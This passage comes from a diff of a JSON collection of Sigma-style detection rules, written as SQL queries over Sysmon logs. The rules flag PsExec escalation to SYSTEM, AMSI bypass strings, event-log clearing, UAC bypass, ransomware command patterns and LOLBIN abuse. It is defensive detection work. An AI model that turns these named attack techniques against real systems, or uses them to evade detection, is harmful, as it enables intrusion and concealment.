"filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' 
ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' 
ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "status": "experimental", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": 
"9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "status": "experimental", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting 
\"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1059", "attack.t1202" ], "falsepositives": [ 
@@ -21072,1832 +21133,1777 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], 
"falsepositives": [ - "Legitimate WinRM usage" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.impact", - "attack.t1496" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - 
"id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", 
"status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "NTDS maintenance" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": 
"proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE 
'% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": 
